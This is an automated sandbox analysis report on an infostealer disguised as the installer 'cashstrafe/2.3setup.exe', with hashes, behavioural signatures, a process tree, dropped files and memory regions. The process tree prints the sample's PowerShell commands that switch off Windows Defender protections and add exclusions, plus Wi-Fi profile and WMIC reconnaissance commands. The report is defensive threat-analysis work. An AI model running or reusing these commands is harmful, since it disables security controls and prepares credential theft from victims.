Resubmissions

08/05/2024, 20:54

240508-zp39cafa8v 3

08/05/2024, 20:54

240508-zpv8qshe76 8

Analysis

  • max time kernel
    120s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/05/2024, 20:54

General

  • Target

    cashstrafe/2.3setup.exe

  • Size

    15.6MB

  • MD5

    6a109e709c03acd33a5619f46d4857fc

  • SHA1

    7cbdcb9c10b28d509d43c0c33f3fe524f0f19b09

  • SHA256

    48dfb6defced66346ed09174e4c62aa36f7006c39ce7ee57d4e7f3684cb3c629

  • SHA512

    ec2698bca6e9de2482f1dd45213ce21b28bd8cd17f16bf7d1e4a9015682e8eda7d4d124208578d71c2930b00031515f5b90a47cf4fa44377fcb198cfcb0c7577

  • SSDEEP

    393216:7h9S2nnx837XfZh2Jp5MLurEUWjljEh01tGymWX8Wjs+da:d9Dnxq7BhpdbJ91symJes+da

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe
    "C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2468
    • C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe
      "C:\Users\Admin\AppData\Local\Temp\cashstrafe\2.3setup.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4628
        • C:\Windows\system32\netsh.exe
          netsh wlan show profiles
          4⤵
            PID:1640
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3460
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2120
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5056
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2932
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4724
        • C:\Windows\System32\Wbem\wmic.exe
          wmic cpu get Name
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4924
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            4⤵
              PID:2168
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4540
            • C:\Windows\System32\wbem\WMIC.exe
              C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
              4⤵
                PID:2624

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\0dAunZT8ao\Browser\cc's.txt

                Filesize

                91B

                MD5

                5aa796b6950a92a226cc5c98ed1c47e8

                SHA1

                6706a4082fc2c141272122f1ca424a446506c44d

                SHA256

                c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c

                SHA512

                976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

              • C:\Users\Admin\AppData\Local\Temp\0dAunZT8ao\Browser\history.txt

                Filesize

                23B

                MD5

                5638715e9aaa8d3f45999ec395e18e77

                SHA1

                4e3dc4a1123edddf06d92575a033b42a662fe4ad

                SHA256

                4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6

                SHA512

                78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_cbc.pyd

                Filesize

                10KB

                MD5

                e0dd54d1a4a8b3f4a2b7fb67bc2e6297

                SHA1

                b184c2ed3dd46d527df992ffe0c57ef8eb364eea

                SHA256

                b6b7cce003744af2342afef0f2536cdbbccd3a271f15f72aefc740332312281e

                SHA512

                960f3e6e3a6168ba65d690cb9c94541de8f5a8afb456b5db8d7c0392d0d935cf47245eb88160606be12d54c32f1dc1e1ebf7c6049a310654847e0d473d1726a6

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_cfb.pyd

                Filesize

                10KB

                MD5

                534fc55a686a5e2993b5f0f55de816b6

                SHA1

                b4f4d659ed48e7a0ebee924c46df981351bf5ccd

                SHA256

                65f991b7e0831110acb0556d5fbe2054a9ea696a7f4b373d86cd21d7c9c60b78

                SHA512

                fec49bcf30ed50fe652cbdaf33c3a8cde430fdc04d86b078f9a69ac9be0f5fdc5a81420bc713ca9275e622a49040b1413a5789b3d2675941ed88cfb33e1e7ec1

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_ecb.pyd

                Filesize

                9KB

                MD5

                1a48e6e2a3243a0e38996e61f9f61a68

                SHA1

                488a1aa38cd3c068bdf24b96234a12232007616c

                SHA256

                c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061

                SHA512

                d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\Cryptodome\Cipher\_raw_ofb.pyd

                Filesize

                10KB

                MD5

                809c778ab43526125360d64074cd21e0

                SHA1

                c8d76cb472b408399ecc47acb1346e2dbc6ff264

                SHA256

                a4f4451384b7cf09de3d8ff262d4f54f6ef2b078c0daa54c725c0341a2f94797

                SHA512

                14240ebecb8cbde9c83d9c0b50d9506bc3d32553ddcf1db9bb8aeae70ffc09e20f73859274de57876d7adbf894c1f54665d8439b53e64ce3ef0aebe7c98b878d

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\VCRUNTIME140.dll

                Filesize

                116KB

                MD5

                be8dbe2dc77ebe7f88f910c61aec691a

                SHA1

                a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                SHA256

                4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                SHA512

                0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\VCRUNTIME140_1.dll

                Filesize

                48KB

                MD5

                f8dfa78045620cf8a732e67d1b1eb53d

                SHA1

                ff9a604d8c99405bfdbbf4295825d3fcbc792704

                SHA256

                a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

                SHA512

                ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_asyncio.pyd

                Filesize

                37KB

                MD5

                b72e9a2f4d4389175e96cd4086b27aac

                SHA1

                2acfa17bb063ee9cf36fadbac802e95551d70d85

                SHA256

                f9924bbead1aca98422ba421f5139a4c147559aae5928dfd2f6aada20cb6bb42

                SHA512

                b55f40451fa9bdd62c761823613fcfe734aaa28e26fb02a9620ad39ab7539c9257eac8cc10d4a3f2390c23a4d951cc02d695498530a4c1d91b4e51e625316e06

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_bz2.pyd

                Filesize

                48KB

                MD5

                f991618bfd497e87441d2628c39ea413

                SHA1

                98819134d64f44f83a18985c2ec1e9ee8b949290

                SHA256

                333c06fad79094d43465d128d68078296c925d1ea2b6b5bf13072a8d5cb65e7e

                SHA512

                3a9ecb293abedcdba3493feb7d19f987735ced5a5194abaa1d1e00946e7ea0f878dd71868eb3d9bfec80432df862367661b825c9e71409c60ec73d1708a63ef6

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_cffi_backend.cp312-win_amd64.pyd

                Filesize

                71KB

                MD5

                886da52cb1d06bd17acbd5c29355a3f5

                SHA1

                45dee87aefb1300ec51f612c3b2a204874be6f28

                SHA256

                770d04ebe9f4d8271659ba9bf186b8ae422fdd76f7293dbc84be78d9d6dd92cc

                SHA512

                d6c7a90b8fa017f72f499943d73e4015f2eec0e46188c27848892a99be35e0ecbda1f692630863b89109b04636e813ddad2051f323a24b4d373192a6b67cf978

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_ctypes.pyd

                Filesize

                59KB

                MD5

                76288ffffdce92111c79636f71b9bc9d

                SHA1

                15c10dcd31dab89522bf5b790e912dc7e6b3183b

                SHA256

                192cc2ac818c78cd21e9f969a95c0ff777d4cd5f79ae51ab7c366d2b8540f6a1

                SHA512

                29efc143cd72bf886e9bf54463706484f22222f024bd7e8cb206c32f40b76d823efd36061b05bbd6bcf562f83d95449acb3f1440c95e63750c643c15a10816c9

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_decimal.pyd

                Filesize

                105KB

                MD5

                c2f5d61323fb7d08f90231300658c299

                SHA1

                a6b15204980e28fc660b5a23194348e6aded83fc

                SHA256

                a8ea1e613149d04e7ce637413aad6df636556916902718f64e57fdff44f959bb

                SHA512

                df22676b5268175562574078459820f11eedb06f2845c86398c54861e9e3fb92547e7341b497fb0e79e9d3abba655e6593b1049bf78818c0ba7b9c96e3748606

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_hashlib.pyd

                Filesize

                35KB

                MD5

                caaea46ee25211cbdc762feb95dc1e4d

                SHA1

                1f900cc99c02f4300d65628c1b22ddf8f39a94d4

                SHA256

                3ef6e0e5bf3f1ea9713f534c496a96eded9d3394a64324b046a61222dab5073b

                SHA512

                68c2b1634fcca930c1651f550494a2ef187cf52dce8ff28f410ebed4d84487e3b08f6f70223a83b5313c564dcd293748f3c22f2a4218218e634e924c8390cf9a

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_lzma.pyd

                Filesize

                86KB

                MD5

                f07f0cfe4bc118aebcde63740635a565

                SHA1

                44ee88102830434bb9245934d6d4456c77c7b649

                SHA256

                cc5302895aa164d5667d0df3ebeeee804384889b01d38182b3f7179f3c4ff8c0

                SHA512

                fcd701903ccd454a661c27835b53f738d947f38e9d67620f52f12781a293e42ae6b96c260600396883d95dd5f536dba2874aaee083adbcc78d66873cefc8e99d

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_multiprocessing.pyd

                Filesize

                27KB

                MD5

                0c942dacb385235a97e373bdbe8a1a5e

                SHA1

                cf864c004d710525f2cf1bec9c19ddf28984ca72

                SHA256

                d5161d4e260b2bb498f917307f1c21381d738833efc6e8008f2ebfb9447c583b

                SHA512

                ca10c6842634cec3cada209b61dd5b60d8ea63722e3a77aa05e8c61f64b1564febe9612b554a469927dbce877b6c29c357b099e81fa7e73ceeae04b8998aa5a5

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_overlapped.pyd

                Filesize

                33KB

                MD5

                ed9cff0d68ba23aad53c3a5791668e8d

                SHA1

                a38c9886d0de7224e36516467803c66a2e71c7d9

                SHA256

                e88452d26499f51d48fe4b6bd95fc782bad809f0cb009d249aacf688b9a4e43f

                SHA512

                6020f886702d9ff6530b1f0dad548db6ad34171a1eb677cb1ba14d9a8943664934d0cfe68b642b1dd942a70e3ae375071591a66b709c90bd8a13303a54d2198b

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_queue.pyd

                Filesize

                26KB

                MD5

                8347192a8c190895ec8806a3291e70d9

                SHA1

                0a634f4bd15b7ce719d91f0c1332e621f90d3f83

                SHA256

                b1ad27547e8f7ab2d1ce829ca9bdcc2b332dc5c2ef4fe224ccb76c78821c7a19

                SHA512

                de6858ed68982844c405ca8aecf5a0aa62127807b783a154ba5d844b44f0f8f42828dc097ac4d0d1aa8366cdcab44b314effcb0020b65db4657df83b1b8f5fed

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_socket.pyd

                Filesize

                44KB

                MD5

                7e92d1817e81cbafdbe29f8bec91a271

                SHA1

                08868b9895196f194b2e054c04edccf1a4b69524

                SHA256

                19573ccc379190277674a013f35bf055f6dbb57adfce79152152a0de3ff8c87c

                SHA512

                0ed41a3ce83b8f4a492555a41881d292ece61d544f0a4df282f3cc37822255a7a32647724568c9a3b04d13fd3cc93eb080e54ac2ce7705b6b470454366be1cbe

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_sqlite3.pyd

                Filesize

                57KB

                MD5

                29a6551e9b7735a4cb4a61c86f4eb66c

                SHA1

                f552a610d64a181b675c70c3b730aa746e1612d0

                SHA256

                78c29a6479a0a2741920937d13d404e0c69d21f6bd76bdfec5d415857391b517

                SHA512

                54a322bfe5e34f0b6b713e22df312cfbde4a2b52240a920b2fa3347939cf2a1fecbeac44d7c1fa2355ee6dc714891acd3ee827d73131fd1e39fba390c3a444e6

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_ssl.pyd

                Filesize

                65KB

                MD5

                8696f07039706f2e444f83bb05a65659

                SHA1

                6c6fff6770a757e7c4b22e6e22982317727bf65b

                SHA256

                5405af77bc6ad0c598490b666c599c625195f7bf2a63db83632e3a416c73e371

                SHA512

                93e9f8fc1ae8a458eb4d9e7d7294b5c2230cb753386842e72d07cb7f43f248d204d13d93aedae95ec1a7aa6a81a7c09fdba56a0bc31924a1722c423473d97758

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_uuid.pyd

                Filesize

                24KB

                MD5

                7a00ff38d376abaaa1394a4080a6305b

                SHA1

                d43a9e3aa3114e7fc85c851c9791e839b3a0ee13

                SHA256

                720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016

                SHA512

                ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\_wmi.pyd

                Filesize

                28KB

                MD5

                f3767430bbc7664d719e864759b806e4

                SHA1

                f27d26e99141f15776177756de303e83422f7d07

                SHA256

                787caad25cb4e2df023ead5e5a3fcd160b1c59a2e4ae1fc7b25c5087964defe8

                SHA512

                b587dfff4ba86142663de6ef8710ac7ab8831ca5fc989820b6a197bcd31ac5fdcb0b5982bf9a1fc13b331d0e53dc1b7367b54bb47910f3d1e18f8193449acb9c

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\base_library.zip

                Filesize

                1.3MB

                MD5

                630153ac2b37b16b8c5b0dbb69a3b9d6

                SHA1

                f901cd701fe081489b45d18157b4a15c83943d9d

                SHA256

                ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2

                SHA512

                7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\charset_normalizer\md.cp312-win_amd64.pyd

                Filesize

                9KB

                MD5

                21898e2e770cb9b71dc5973dd0d0ede0

                SHA1

                99de75d743f6e658a1bec52419230690b3e84677

                SHA256

                edd490bec8ec903cdbf62f39e0675181e50b7f1df4dc48a3e650e18d19804138

                SHA512

                dc8636d817ae1199200c24ac22def5d12642db951b87f4826015fd1d5c428d45410ce3b7f5bb5aaaa05deecf91d954b948f537bd6fa52a53364ab3609caac81d

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

                Filesize

                39KB

                MD5

                4e5cd67d83f5226410ef9f5bc6fddab9

                SHA1

                dd75f79986808ff22f1049680f848a547ba7ab84

                SHA256

                80645609f9a48a8aaf988fa667f5aa32445e32f8027f61b27884d738ad608ae4

                SHA512

                e52eb7b51562a336c73c6b5b8a1ae821a7c2ad0145633858fc78d6af1a27d8f57ba59cfffa84a376f59d5362a19a7cc09fa1f691c7b50b3ac27c439781a42ba0

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\libcrypto-3.dll

                Filesize

                1.6MB

                MD5

                e68a459f00b05b0bd7eafe3da4744aa9

                SHA1

                41565d2cc2daedd148eeae0c57acd385a6a74254

                SHA256

                3fcf6956df6f5dc92b2519062b40475b94786184388540a0353f8a0868413648

                SHA512

                6c4f3747af7be340a3db91e906b949684a39cafc07f42b9fcc27116f4f4bf405583fc0db3684312b277d000d8e6a566db2c43601fa2af499700319c660ef1108

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\libffi-8.dll

                Filesize

                29KB

                MD5

                bb1feaa818eba7757ada3d06f5c57557

                SHA1

                f2de5f06dc6884166de165d34ef2b029bb0acf8b

                SHA256

                a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29

                SHA512

                95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\libssl-3.dll

                Filesize

                222KB

                MD5

                9b8d3341e1866178f8cecf3d5a416ac8

                SHA1

                8f2725b78795237568905f1a9cd763a001826e86

                SHA256

                85dd8c17928e78c20cf915c1985659fe99088239793f2bd46acb31a3c344c559

                SHA512

                815abc0517f94982fc402480bba6e0749f44150765e7f8975e4fcbfce62c4a5ff741e39e462d66b64ba3b804bd5b7190b67fff037d11bb314c7d581cfa6097a8

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\psutil\_psutil_windows.pyd

                Filesize

                31KB

                MD5

                d2ab09582b4c649abf814cdce5d34701

                SHA1

                b7a3ebd6ff94710cf527baf0bb920b42d4055649

                SHA256

                571115cca942bc76010b379df5d28afcb0f0d0de65a3bac89a95c6a86838b983

                SHA512

                022ccaeb99dc08997d917f85c6bc3aefdad5074c995008942a2f35f46ba07d73bb5bc7bc971ec71cb0e60dcb096b2c990866fe29c57670d069e7bdc3b14f6172

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\pyexpat.pyd

                Filesize

                87KB

                MD5

                edcb8f65306461e42065ac6fc3bae5e7

                SHA1

                4faa04375c3d2c2203be831995403e977f1141eb

                SHA256

                1299da117c98d741e31c8fb117b0f65ae039a4122934a93d0bbb8dfbddd2dcd7

                SHA512

                221e6e1eb9065f54a48040b48f7b6109853306f04506ccf9ecb2f5813a5bd9675c38565a59e72770bf33d132977aa1558cc290720e39a4f3a74a0e7c2a3f88fa

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\python3.DLL

                Filesize

                66KB

                MD5

                6271a2fe61978ca93e60588b6b63deb2

                SHA1

                be26455750789083865fe91e2b7a1ba1b457efb8

                SHA256

                a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb

                SHA512

                8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\python312.dll

                Filesize

                1.8MB

                MD5

                2889fb28cd8f2f32997be99eb81fd7eb

                SHA1

                adfeb3a08d20e22dde67b60869c93291ca688093

                SHA256

                435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637

                SHA512

                aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\select.pyd

                Filesize

                25KB

                MD5

                c16b7b88792826c2238d3cf28ce773dd

                SHA1

                198b5d424a66c85e2c07e531242c52619d932afa

                SHA256

                b81be8cc053734f317ff4de3476dd8c383cc65fe3f2f1e193a20181f9ead3747

                SHA512

                7b1b2494fe0ef71869072d3c41ba1f2b67e3b9dcc36603d1503bb914d8b8e803dc1b66a3cbf0e45c43e4a5b7a8f44504a35d5e8e1090d857b28b7eba1b89c08a

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\sqlite3.dll

                Filesize

                630KB

                MD5

                8776a7f72e38d2ee7693c61009835b0c

                SHA1

                677a127c04ef890e372d70adc2ab388134753d41

                SHA256

                c467fcc7377b4a176e8963f54ffff5c96d1eb86d95c4df839af070d6d7dbf954

                SHA512

                815bf905fa9a66c05e5c92506d2661c87559c6205c71daa205368dbfd3d56b8a302a4d31729bc6d4c1d86cbcf057638aa17bde0d85ccc59ce1cbcb9e64349732

              • C:\Users\Admin\AppData\Local\Temp\_MEI24682\unicodedata.pyd

                Filesize

                295KB

                MD5

                4253cde4d54e752ae54ff45217361471

                SHA1

                06aa069c348b10158d2412f473c243b24d6fc7bc

                SHA256

                67634e2df60da6b457e4ebfbae3edb1f48d87752221600a5814b5e8f351166e6

                SHA512

                3b714a57747eddf39fc3a84ab3ca37cc0b8103dd3f987331ffb2d1d46f9a34f3793bb0493c55e02ab873314c8990eaebdd0284ad087a651c06a7f862b1a61c80

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cyjkzr5.mom.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/1948-184-0x00007FFA7BAD0000-0x00007FFA7BADC000-memory.dmp

                Filesize

                48KB

              • memory/1948-93-0x00007FFA6CFD0000-0x00007FFA6D6A9000-memory.dmp

                Filesize

                6.8MB

              • memory/1948-146-0x0000029E601E0000-0x0000029E60709000-memory.dmp

                Filesize

                5.2MB

              • memory/1948-144-0x00007FFA7C0D0000-0x00007FFA7C19D000-memory.dmp

                Filesize

                820KB

              • memory/1948-150-0x00007FFA7C810000-0x00007FFA7C822000-memory.dmp

                Filesize

                72KB

              • memory/1948-148-0x00007FFA7CA20000-0x00007FFA7CA36000-memory.dmp

                Filesize

                88KB

              • memory/1948-154-0x00007FFA6C080000-0x00007FFA6C1F6000-memory.dmp

                Filesize

                1.5MB

              • memory/1948-153-0x00007FFA7C290000-0x00007FFA7C2B4000-memory.dmp

                Filesize

                144KB

              • memory/1948-140-0x00007FFA7C680000-0x00007FFA7C6B3000-memory.dmp

                Filesize

                204KB

              • memory/1948-127-0x00007FFA803C0000-0x00007FFA803D9000-memory.dmp

                Filesize

                100KB

              • memory/1948-170-0x00007FFA82810000-0x00007FFA82835000-memory.dmp

                Filesize

                148KB

              • memory/1948-128-0x00007FFA80230000-0x00007FFA8025D000-memory.dmp

                Filesize

                180KB

              • memory/1948-134-0x00007FFA82620000-0x00007FFA8262D000-memory.dmp

                Filesize

                52KB

              • memory/1948-135-0x00007FFA7C940000-0x00007FFA7C975000-memory.dmp

                Filesize

                212KB

              • memory/1948-169-0x00007FFA7BFB0000-0x00007FFA7BFD7000-memory.dmp

                Filesize

                156KB

              • memory/1948-168-0x00007FFA6BF60000-0x00007FFA6C07B000-memory.dmp

                Filesize

                1.1MB

              • memory/1948-167-0x00007FFA7D360000-0x00007FFA7D36B000-memory.dmp

                Filesize

                44KB

              • memory/1948-166-0x00007FFA6CFD0000-0x00007FFA6D6A9000-memory.dmp

                Filesize

                6.8MB

              • memory/1948-195-0x00007FFA7CA10000-0x00007FFA7CA1B000-memory.dmp

                Filesize

                44KB

              • memory/1948-194-0x00007FFA6BCD0000-0x00007FFA6BF53000-memory.dmp

                Filesize

                2.5MB

              • memory/1948-193-0x00007FFA791C0000-0x00007FFA791CC000-memory.dmp

                Filesize

                48KB

              • memory/1948-192-0x00007FFA7B1E0000-0x00007FFA7B1F2000-memory.dmp

                Filesize

                72KB

              • memory/1948-191-0x00007FFA7B200000-0x00007FFA7B20D000-memory.dmp

                Filesize

                52KB

              • memory/1948-190-0x00007FFA7B210000-0x00007FFA7B21C000-memory.dmp

                Filesize

                48KB

              • memory/1948-189-0x00007FFA7B430000-0x00007FFA7B43C000-memory.dmp

                Filesize

                48KB

              • memory/1948-188-0x00007FFA7BA90000-0x00007FFA7BA9B000-memory.dmp

                Filesize

                44KB

              • memory/1948-187-0x00007FFA7BAA0000-0x00007FFA7BAAB000-memory.dmp

                Filesize

                44KB

              • memory/1948-186-0x00007FFA7BAB0000-0x00007FFA7BABC000-memory.dmp

                Filesize

                48KB

              • memory/1948-185-0x00007FFA7BAC0000-0x00007FFA7BACE000-memory.dmp

                Filesize

                56KB

              • memory/1948-136-0x00007FFA7E510000-0x00007FFA7E529000-memory.dmp

                Filesize

                100KB

              • memory/1948-183-0x00007FFA7BAE0000-0x00007FFA7BAEC000-memory.dmp

                Filesize

                48KB

              • memory/1948-182-0x00007FFA7BAF0000-0x00007FFA7BAFB000-memory.dmp

                Filesize

                44KB

              • memory/1948-181-0x00007FFA7BF90000-0x00007FFA7BF9C000-memory.dmp

                Filesize

                48KB

              • memory/1948-180-0x00007FFA7BFA0000-0x00007FFA7BFAB000-memory.dmp

                Filesize

                44KB

              • memory/1948-179-0x00007FFA7C070000-0x00007FFA7C07C000-memory.dmp

                Filesize

                48KB

              • memory/1948-178-0x00007FFA7C670000-0x00007FFA7C67B000-memory.dmp

                Filesize

                44KB

              • memory/1948-137-0x00007FFA803B0000-0x00007FFA803BD000-memory.dmp

                Filesize

                52KB

              • memory/1948-162-0x00007FFA7C250000-0x00007FFA7C264000-memory.dmp

                Filesize

                80KB

              • memory/1948-161-0x00007FFA7C270000-0x00007FFA7C288000-memory.dmp

                Filesize

                96KB

              • memory/1948-138-0x00007FFA80350000-0x00007FFA8035D000-memory.dmp

                Filesize

                52KB

              • memory/1948-198-0x00007FFA732A0000-0x00007FFA732CE000-memory.dmp

                Filesize

                184KB

              • memory/1948-197-0x00007FFA732D0000-0x00007FFA732F9000-memory.dmp

                Filesize

                164KB

              • memory/1948-196-0x00007FFA82620000-0x00007FFA8262D000-memory.dmp

                Filesize

                52KB

